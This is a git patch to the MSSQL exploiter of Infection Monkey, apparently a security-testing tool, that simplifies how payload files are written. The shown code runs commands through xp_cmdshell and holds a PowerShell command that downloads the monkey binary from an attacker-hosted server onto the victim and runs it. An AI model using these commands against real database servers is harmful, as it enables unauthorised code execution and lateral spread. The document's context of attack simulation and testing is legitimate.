From 7846a6cac1ac4b34b1a3a7ffd5a9e957a857e17b Mon Sep 17 00:00:00 2001
From: Mike Salvatore <mike.s.salvatore@gmail.com>
Date: Tue, 14 Jun 2022 12:13:45 -0400
Subject: [PATCH] Agent: Remove create_empty_payload_file() in MSSQLExploiter

Since the commands are no longer split up into 128 character chunks,
it's simpler to just overwrite an existing file using `>` than to create
an empty file and append to it.
---
 monkey/infection_monkey/exploit/mssqlexec.py | 17 ++---------------
 1 file changed, 2 insertions(+), 15 deletions(-)

diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 4f9608acb..8b378f418 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -37,8 +37,7 @@ class MSSQLExploiter(HostExploiter):
     XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
     XP_CMDSHELL_COMMAND_END = "'"
     EXPLOIT_COMMAND_PREFIX = "<nul set /p="
-    EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
-    CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
+    EXPLOIT_COMMAND_SUFFIX = ">{payload_file_path}"
     MONKEY_DOWNLOAD_COMMAND = (
         "powershell (new-object System.Net.WebClient)."
         "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
@@ -79,15 +78,11 @@ class MSSQLExploiter(HostExploiter):
         try:
             # Create dir for payload
             self.create_temp_dir()
-            self.create_empty_payload_file()
 
             http_thread = self.start_monkey_server(monkey_path_on_victim)
             self.upload_monkey(monkey_path_on_victim)
             MSSQLExploiter._stop_monkey_server(http_thread)
 
-            # Clear payload to pass in another command
-            self.create_empty_payload_file()
-
             self.run_monkey(monkey_path_on_victim)
 
             self.remove_temp_dir()
@@ -116,14 +111,6 @@ class MSSQLExploiter(HostExploiter):
         )
         self.run_mssql_command(dir_creation_command)
 
-    def create_empty_payload_file(self):
-        logger.debug(f"Creating an empty payload file: {self.payload_file_path}")
-        suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
-            payload_file_path=self.payload_file_path
-        )
-        tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
-        self.run_mssql_command(tmp_file_creation_command)
-
     def run_mssql_command(self, mssql_command):
         array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
         if not array_of_commands:
@@ -182,7 +169,7 @@ class MSSQLExploiter(HostExploiter):
         monkey_args = build_monkey_commandline(
             self.host, self.current_depth - 1, monkey_path_on_victim
         )
-        suffix = ">>{}".format(self.payload_file_path)
+        suffix = ">{}".format(self.payload_file_path)
         prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
         return MSSQLLimitedSizePayload(
             command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),